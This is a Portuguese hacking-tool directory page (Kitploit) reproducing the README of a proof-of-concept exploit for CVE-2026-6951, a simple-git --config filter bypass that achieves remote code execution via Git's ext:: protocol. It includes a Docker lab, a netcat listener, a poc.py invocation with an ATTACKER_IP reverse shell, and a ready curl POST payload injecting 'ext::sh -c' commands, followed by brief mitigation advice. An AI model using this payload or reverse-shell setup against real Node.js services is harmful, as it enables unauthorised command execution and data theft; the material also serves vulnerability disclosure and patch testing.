Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-6951 — Proof-of-concept de exploit para CVE-2026-6951, um bypass do filtro --config do simple-git que permite RCE através do protocolo ext do Git, com um laboratório Docker e payload de reverse shell. | Kitploit
Ferramentas/GitHubGitHub/eqstlab/cve-2026-6951
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHubeqstlab/cve-2026-6951

CVE-2026-6951

Proof-of-concept de exploit para CVE-2026-6951, um bypass do filtro --config do simple-git que permite RCE através do protocolo ext do Git, com um laboratório Docker e payload de reverse shell.

Ver Repositório
11há 1 diaAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-6951 Execução Remota de Código no simple-git

★ PoC de RCE por Bypass do Filtro da Opção --config do simple-git CVE-2026-6951 ★

https://github.com/user-attachments/assets/4c992530-c5bb-4ff4-be5d-af0857eebb67


Visão Geral

CVE-2026-6951 é uma vulnerabilidade de execução remota de código no simple-git causada por uma correção incompleta para a CVE-2022-25912. Embora a opção -c tenha sido bloqueada, a opção equivalente --config não foi devidamente restringida. Um atacante que consiga controlar argumentos do Git pode habilitar o protocolo ext e executar comandos arbitrários através de uma URL de repositório ext::.


Versões Afetadas

CategoriaVersão
Vulnerávelversões do simple-git anteriores à 3.36.0
Corrigidasimple-git 3.36.0 ou posterior

Este ambiente utiliza simple-git 3.35.2 e @simple-git/argv-parser 1.0.3.


Impacto

  • Execução remota de código com os privilégios da aplicação Node.js
  • Divulgação de arquivos sensíveis
  • Acesso via reverse shell
  • Modificação ou exclusão de dados da aplicação

Ambiente

Compile e execute o ambiente vulnerável.

docker build -t cve-2026-6951 .
docker run --rm -d --name cve-2026-6951 -p 9107:9107 cve-2026-6951

Acesse o serviço em:

http://127.0.0.1:9107

Verifique o status do serviço.

curl -s http://127.0.0.1:9107/api/health

O repositório de exemplo incorporado está disponível em:

file:///srv/git/sample.git

PoC

Inicie um listener no sistema do atacante.

nc -lvnp 4444

Execute o script de exploit.

python3 poc.py http://127.0.0.1:9107 --lhost ATTACKER_IP --lport 4444

A requisição a seguir executa o comando id abusando da opção --config irrestrita e do protocolo ext do Git.

curl -s -X POST http://127.0.0.1:9107/api/import \
  -H 'Content-Type: application/json' \
  --data-raw '{
    "repository":"ext::sh -c id% >&2",
    "name":"id-check",
    "options":["--config","protocol.ext.allow=always"],
    "environment":{}
  }'

Mitigação

  • Atualize o simple-git para a versão 3.36.0 ou posterior.
  • Não passe opções do Git controladas pelo usuário diretamente para o simple-git.
  • Permita apenas esquemas de URL de repositório confiáveis e rejeite URLs ext::.
  • Aplique validação estrita por allowlist em URLs de repositório e argumentos do Git.

Análise

  • KR:
  • EN:
Baixar ferramenta